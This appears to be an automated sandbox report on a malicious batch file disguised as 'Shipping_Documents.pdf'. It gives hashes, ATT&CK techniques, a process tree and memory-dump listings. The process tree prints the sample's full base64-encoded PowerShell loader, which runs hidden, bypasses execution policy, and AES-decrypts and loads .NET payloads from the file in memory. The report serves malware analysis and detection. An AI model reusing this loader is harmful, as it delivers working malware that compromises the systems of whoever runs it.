9dce073765428a2d48eebf68eda9f67a94d6de41b41daae3a236416a1850b8c1

General

Target

Shipping_Documents.pdf.bat
Size

64KB
MD5

09433b8bcc804eb2d86576f9064a37ef
SHA1

17c9e11369e65e40e621061cde2da11e479d6aa4
SHA256

370fe2362d5ffa4bbcf6dd32cfcfd744809f5ae9c951c6c66950da695f554679
SHA512

d64cc7c3e095507d2ddfa324808b98db01463007ae2c6f6eb4e6523514340ba32d066f9ae1f46019c2a1787625c028bc369cebc3cbb8800650a4205c89ac28f8
SSDEEP

1536:7ZlVZkbmEKUgXEXzICKUnFASrMO2hX47MtDt8TpEn3WK2op7BeX:7ZeHfiSWho7Mg9WMX

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2820	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2728	cmd.exe
2828	cmd.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2820	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2820	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2728 wrote to memory of 2828	2728	cmd.exe	31
PID 2728 wrote to memory of 2828	2728	cmd.exe	31
PID 2728 wrote to memory of 2828	2728	cmd.exe	31
PID 2828 wrote to memory of 2820	2828	cmd.exe	33
PID 2828 wrote to memory of 2820	2828	cmd.exe	33
PID 2828 wrote to memory of 2820	2828	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Shipping_Documents.pdf.bat"
1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Shipping_Documents.pdf.bat"
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskeHR5bWEgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHh0eW1hKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICR4dHltYSIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCR4dHltYSwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkeHR5bWEiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZWlib24oJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJzZJWTI0T2F6WWQzb0ExeVF0NFZLc0dDVEtUQ1dWVlRWdURGYmhZa0Q4R1U9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJytzSW1Ca3hBZmllR05LbjA3ZDIzWWc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gcW5kZXAoJHBhcmFtX3Zhcil7CSRlaG5nZj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkeW9lb2c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkd3F4dHM9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkZWhuZ2YsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHdxeHRzLkNvcHlUbygkeW9lb2cpOwkkd3F4dHMuRGlzcG9zZSgpOwkkZWhuZ2YuRGlzcG9zZSgpOwkkeW9lb2cuRGlzcG9zZSgpOwkkeW9lb2cuVG9BcnJheSgpO31mdW5jdGlvbiBpY2RqaygkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJG56b2p6PVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGZraW9wPSRuem9qei5FbnRyeVBvaW50OwkkZmtpb3AuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHh0eW1hOyR2ZGtycz1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHh0eW1hKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkenNpIGluICR2ZGtycykgewlpZiAoJHpzaS5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV5bnZrPSR6c2kuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JHBmd25kPVtzdHJpbmdbXV0kdXludmsuU3BsaXQoJ1wnKTskaWRreGY9cW5kZXAgKGVpYm9uIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBmd25kWzBdKSkpOyR1aGxraT1xbmRlcCAoZWlib24gKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcGZ3bmRbMV0pKSk7aWNkamsgJGlka3hmICRudWxsO2ljZGprICR1aGxraSAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2820-6-0x000007FEF626E000-0x000007FEF626F000-memory.dmp

Filesize
4KB

Download
memory/2820-7-0x000000001B120000-0x000000001B402000-memory.dmp

Filesize
2.9MB

Download
memory/2820-8-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-9-0x0000000002060000-0x0000000002068000-memory.dmp

Filesize
32KB

Download
memory/2820-10-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-11-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-12-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-13-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

Filesize
9.6MB

Download
memory/2820-14-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing